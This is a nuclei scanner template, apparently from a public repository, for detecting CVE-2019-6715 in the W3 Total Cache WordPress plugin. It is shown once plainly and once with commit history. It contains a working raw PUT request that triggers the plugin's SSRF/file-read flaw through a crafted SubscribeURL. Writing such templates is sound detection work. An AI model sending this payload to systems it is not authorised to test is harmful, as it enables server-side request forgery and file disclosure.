nuclei-templates/cves/CVE-2019-6715.yaml

id: cve-2019-6715

info:
  name: CVE-2019-6715
  author: randomrobbie
  severity: high
  description: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated Arbitrary File Read / SSRF

requests:
  - raw:
      - |
        PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36
        Content-Length: 124
        Content-Type: application/x-www-form-urlencoded
        Connection: close

        {"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}

    matchers:
      - type: word
        words:
          - "TmVzc3VzQ29kZUV4ZWNUZXN0"
        part: body
Update CVE-2019-6715.yaml 2020-09-17 16:39:30 +00:00			`id: cve-2019-6715`
Create CVE-2019-6715.yaml 2020-09-17 14:59:14 +00:00
			`info:`
			`name: CVE-2019-6715`
			`author: randomrobbie`
			`severity: high`
			`description: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated Arbitrary File Read / SSRF`

			`requests:`
			`- raw:`
			`- \|`
			`PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Accept: /`
			`User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36`
			`Content-Length: 124`
			`Content-Type: application/x-www-form-urlencoded`
			`Connection: close`

			`{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}`
Update CVE-2019-6715.yaml 2020-09-17 16:39:30 +00:00
Create CVE-2019-6715.yaml 2020-09-17 14:59:14 +00:00			`matchers:`
			`- type: word`
			`words:`
			`- "TmVzc3VzQ29kZUV4ZWNUZXN0"`
Update CVE-2019-6715.yaml 2020-09-17 16:39:30 +00:00			`part: body`